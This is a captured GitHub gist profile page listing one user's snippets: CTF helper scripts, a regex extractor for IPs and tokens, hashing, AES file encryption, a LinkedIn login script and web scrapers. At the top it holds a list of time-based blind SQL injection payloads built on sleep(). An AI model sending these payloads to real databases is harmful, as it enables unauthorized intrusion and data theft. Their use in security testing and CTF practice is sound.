Skip to content

Instantly share code, notes, and snippets.

View Th3redTea's full-sized avatar
💭
We shall never surreeeendaaah!

TheRedTea Th3redTea

💭
We shall never surreeeendaaah!
View GitHub Profile
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z%00
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z%00
if(now()=sysdate(),sleep(5),0)%00
'XOR(if(now()=sysdate(),sleep(5),0))XOR'%00
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'%00
0'|(IF((now())LIKE(sysdate()),SLEEP(5),0))|'Z%00
0'or(now()=sysdate()&&SLEEP(1))or'Z%00
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/%00
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/%00
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/%00

Powershell

Hacking with PowerShell

@Th3redTea
Th3redTea / vanilla-js-cheatsheet.md
Created November 8, 2020 14:58 — forked from thegitfather/vanilla-js-cheatsheet.md
Vanilla JavaScript Quick Reference / Cheatsheet
@Th3redTea
Th3redTea / requestor.py
Last active June 13, 2020 17:16
The requestor solves some CTF challneges using requests, RegEx, and BeautifulSoup. This gist was created execlusivly for the PyForGood Tutorial.
#!/usr/bin/python3
import requests
import re
from bs4 import BeautifulSoup
url= "http://challenge01.root-me.org/web-serveur/ch4/"
#This is a extremly simple directory brute forcer.
@Th3redTea
Th3redTea / regexor.py
Last active July 26, 2021 14:23
The fetchor takes any file and fetch for valuable content including IP addresses, JWT, subdomains, and email IDs. This gist was created execlusivly for the PyForGood Tutorial.
#!/usr/bin/python3
import re
def findStuff():
file = open('js.js', 'r') #we open a local file
Text = file.read() #Give the content of the file to the variable Text
#Create a RegEx to look for ip addresses. The findall will look for any string that meets the given pattent in the Text
@Th3redTea
Th3redTea / findhash.py
Last active March 15, 2020 19:54
learnVim.py
#!/usr/bin/python
# Python rogram to find the SHA-1 message digest of a file
# importing the hashlib module
import hashlib
def hash_file(filename):
""""This function returns the SHA-1 hash
of the file passed into it"""
@Th3redTea
Th3redTea / fylecryptor.py
Last active March 24, 2020 23:20
This is a simple scripte to encrypt or decryp files using AES algorithm
#!/usr/bin/python3
# This is a simple script to encrypt and decrypt files using AES encryption alogorithm #
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from Crypto import Random
import sys
import argparse
import os
@Th3redTea
Th3redTea / login.py
Created March 10, 2018 18:59
simple script to login to Linkedin account
#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
binary = FirefoxBinary('/usr/bin/firefox')
@Th3redTea
Th3redTea / traing.py
Created April 3, 2017 10:49
start of the avito's scraper
#!/usr/bin/python3
from bs4 import BeautifulSoup
from urllib.error import HTTPError
import requests
def creat_links():
# swimming into the bewsite and grab every deals link
@Th3redTea
Th3redTea / movie_scraper.py
Last active March 27, 2017 21:56
add some useful comments
#!/usr/bin/python3
#
# So this is a simple example of web sraping using requests and BeautifulSoup
# in this scripte I am trying to generate a list of movies with Arabic substitutes based on online.dramacafe.in website
# version = 0.1
##############################################################################
from bs4 import BeautifulSoup
import requests